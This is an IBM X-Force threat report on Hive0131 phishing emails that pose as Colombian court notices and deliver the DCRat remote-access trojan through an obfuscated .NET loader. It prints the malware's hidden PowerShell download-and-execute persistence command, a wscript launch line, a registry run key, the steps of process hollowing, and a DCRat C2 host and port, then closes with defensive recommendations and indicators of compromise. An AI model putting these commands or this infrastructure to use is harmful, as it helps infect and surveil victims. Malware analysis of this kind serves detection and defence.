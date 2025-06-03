IBM X-Force Threat Analysis: DCRat presence growing in Latin America

Tags
Security
03 June 2025

Authors

Melissa Frydrych-Dean

Threat Hunt Researcher

IBM

Kevin Henson

Malware Reverse Engineer

IBM

In early May 2025, IBM X-Force observed Hive0131 conducting email campaigns targeting users in Colombia with electronic notifications of criminal proceedings, purporting to be from The Judiciary of Colombia. Hive0131 is a financially motivated group likely originating from South America that routinely conducts campaigns largely in Latin America (LATAM) to deliver a wide array of commodity payloads. The current campaigns imitate official correspondence and contain either an embedded link or a PDF lure with an embedded link. Clicking on the embedded link will initiate the infection chain to execute the banking trojan "DCRat" in memory. 

DCRat is operated as a Malware-as-a-Service (MaaS), first appearing in at least 2018, and heavily advertised on Russian cyber crime forums, purchasable for around USD 7 for a two-month subscription. DCRat's presence is widespread and has become increasingly popular in LATAM since at least 2024. Over the summer of 2024, X-Force observed several campaigns heavily targeting entities in Colombia, all imitating a LATAM company specializing in electronic document ecosystems in Mexico and Colombia. However, given the differences in infection chain and the delivery of DCRat, X-Force assesses that the 2024 and current campaigns were conducted by different actors. The campaigns observed in 2024 relied heavily on password-protected RAR files containing NSIS to execute a GuLoader downloader, whereas these recent campaigns rely on an obfuscated .NET loader we've named VMDetectLoader. 

DCRat capabilities

  • Bypasses AMSI
  • Detects analysis environments
  • Kills blocklisted processes
  • Obtains persistence through a scheduled task or registry key
  • Listens for commands from a command and control (C2) server

DCRat comes with plugins that are capable of the following tasks, although threat actors can create custom plugins in order to accomplish additional tasks:

  • Recording a victim through the computer's microphone or camera
  • Uploading and downloading files
  • Executing commands
  • Obtaining system information
  • Encrypting and decrypting files
  • Editing registry keys
  • Logging keystrokes and clipboard data
  • Manipulating the filesystem

Threat type

MaaS

Man looking at computer

Strengthen your security intelligence  

Stay ahead of threats with news and insights on security, AI and more, weekly in the Think Newsletter.  

Subscribe today

Analysis

In early May 2025, X-Force observed Hive0131 email campaigns imitating The Judiciary of Colombia (Rama Judicial de Colombia), purporting to be from the Civil Circuit of Bogota, Colombia, to send out electronic notifications of criminal proceedings. The observed campaigns either contain a PDF lure with a link to a TinyURL or contain an embedded link to a Google Docs location. 

Infection Chain Overview - PDF with TinyURL

For the emails containing a PDF lure leading to a tinyurl, the victim is redirected to a ZIP archive named 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue. The ZIP archive contains benign files as well as a malicious JavaScript file named 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.js. The JavaScript file downloads a JavaScript payload from a paste[.]ee site and executes it. This payload then executes a PowerShell command that downloads a JPG from hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg with a base64-encoded loader appended to the end of the file. Once executed, the loader downloads and executes DCRat in memory.

The loader is given the name VMDetectLoader due to its ability to determine if it's running in a sandbox environment. Analysis indicates that the loader is based on the open-source project https://github.com/robsonfelix/VMDetector.

Infection chain overview - Embedded Google Docs link

This infection chain is initiated with phishing emails that contain a link to a Google Docs download of a password-protected ZIP archive named CUI 158616000129-2025-10047_122011111777.zip, the password of which is in the email and is 3004The archive contains a batch file downloader, CUI 158616000129-2025-10047_122011111777.bat, that downloads and executes an obfuscated VBScript (VBS) component fromhxxp://paste[.]ee/d/jYHEqBJ3/0  to %WinDir%\Temp\Pernambuco.vbs. The VBS script subsequently decodes and executes a base64-encoded PowerShell script that downloads VMDetectLoader via a JPG file fromhxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg
The final payload is then downloaded by VMDetectLoader via a paste[.]ee URL passed to it by the PowerShell script.

VMDetectLoader

VMDetectLoader is an obfuscated .NET loader (Microsoft.Win32.TaskScheduler.dll) which can be found on VirusTotal at https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7. Analysis of the loader's metadata indicates that the code is based on the open-source project https://github.com/robsonfelix/VMDetector.

Assembly Attributes:

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

Before loading the payload, the loader detects virtual machines, printing a list of host attributes to the console if a VM is detected. For example:

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

Functionality

VMDetectLoader is executed via its dnlib.IO.Home.VAI()  function and passed data similar to the following. This information may vary depending on the campaign.

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

Argument

Description

$storeman

 Reversed Pastee URL from which a base64-encoded payload is downloaded. 

MSBuilld

 Target injection process

C:\Users\Public\Downloads
rhabdosteus
js

 Path used in creating a scheduled task: 

C:\Users\Public\Downloads\rhabdosteus.js

1

 Flag that indicates process checks

bimetallism

 Scheduled task name

During execution, VMDetectLoader, XOR decrypts notable strings as needed from the .NET resource "hIXS".

Sample decrypted strings

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

Persistence

If configured to do so, a scheduled task is created to execute the following PowerShell command which downloads and executes a JavaScript payload:

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

Another task may be created, if configured, to execute the JavaScript payload using the following command:

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

The loader may also create a Registry run key to execute the payload:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

Process injection

VMDetectLoader has the ability to use the process hollowing injection technique to load a payload into varying target process instances. For example, for the analyzed campaign, C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (32-bit) or C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (64-bit) is the target process. The function responsible for process injection is named HackForums.gigajew.x64.Load() for 64-bit samples and dnlib.IO.Tools.Ande() for 32-bit samples.

Process hollowing injection process:

  1. Create a suspended process using CreateProcess() with the dwCreationFlags set to CREATE_SUSPENDED (4).
  2. Unmap memory in the target process using ZwUnmapViewOfSection().
  3. Allocate new memory in the target process using VirtualAllocEx().
  4. Write the payload to the newly allocated memory using WriteProcessMemory().
  5. Update the entry point for the process using GetThreadContext() and SetThreadContex().
  6. Execute ResumeThread() to execute the code.

DCRat

If VMDetectLoader determines that it's running in a safe environment, the final payload is loaded via process hollowing. In this instance, the final payload is DCRat with the following configuration data.

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

Conclusion

X-Force tracks several groups operating in the Latin American threat landscape that conduct email campaigns delivering MaaS for the purpose of financial gain. Among the tracked groups are Hive0148 and Hive0149, which focus on delivering the Grandoriero Banking Trojan, Hive0153 delivering Adwind and SambaSpy malware, and Hive0131. Although Hive0131 typically focuses on operations with the delivery of malware such as QuasarRAT and NjRAT, X-Force has observed an increase in campaigns involving DCRat. With the steady and ongoing observances of banking malware delivered to users within LATAM, IBM X-Force assesses that Latin America will continue to face targeting from threat actors seeking to deploy banking trojans via phishing campaigns in attempts to obtain user credentials and other sensitive information.

Recommendations

Entities in LATAM are encouraged to exercise caution with emails containing attachments, links, or that prompt file downloads. In addition, entities are advised to perform the following:

  • Exercise caution with emails containing links or download prompts
  • Monitor for host-based evidence of process injection, rogue process creation, scheduled tasks creation, and registry modifications
  • Install, update and configure endpoint security software
  • Monitor endpoint rules
  • Hunt for the execution policy bypass

Indicators of compromise

Indicator

 Indicator Type

  Context

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

 SHA256

 Carrier File 

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

 SHA256

 ZIP Archive

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

 SHA256

 DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

 SHA256

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

 SHA256

 Obfuscated .NET Loader

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

 SHA256

 ZIP Archive

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

 SHA256

 PS Script

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
de106b3d5491372ccf

 SHA256

 PS Script

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

 SHA256

 Batch Script Downloader

hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8
-4516-82e7-5460d4ebaf3b

 URL

 Embedded PDF Link

hxxp://paste[.]ee/d/bx699sF9/0

 URL

 Payload Download URL

hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

 URL

 Embedded Email Link

hxxp://paste[.]ee/d/jYHEqBJ3/0

 URL

 Payload Download URL

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

 URL

 JPG Download URL

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

   URL

 JPG Download URL

IBM X-Force Premier Threat Intelligence is now integrated with OpenCTI, delivering actionable threat intelligence about this threat activity and more. Access insights on threat actors, malware and industry risks. Install the OpenCTI Connector to enhance detection and response, strengthening your cybersecurity with IBM X-Force’s expertise. Stay ahead—integrate today.

Mixture of Experts | 30 May, episode 57

Decoding AI: Weekly News Roundup

Join our world-class panel of engineers, researchers, product leaders and more as they cut through the AI noise to bring you the latest in AI news and insights.
Watch the latest podcast episodes
Related solutions
Threat management services

Predict, prevent and respond to modern threats, increasing business resilience.

 

 Explore threat management services
Threat detection and response solutions

Use IBM threat detection and response solutions to strengthen your security and accelerate threat detection.

 Explore threat detection solutions
Mobile threat defense (MTD) solutions

Protect your mobile environment with IBM MaaS360’s comprehensive mobile threat defense solutions.

 Explore mobile threat defense solutions
Take the next step

Gain comprehensive threat management solutions, expertly protecting your business from cyberattacks.

 Explore threat management services Book a threat-centric briefing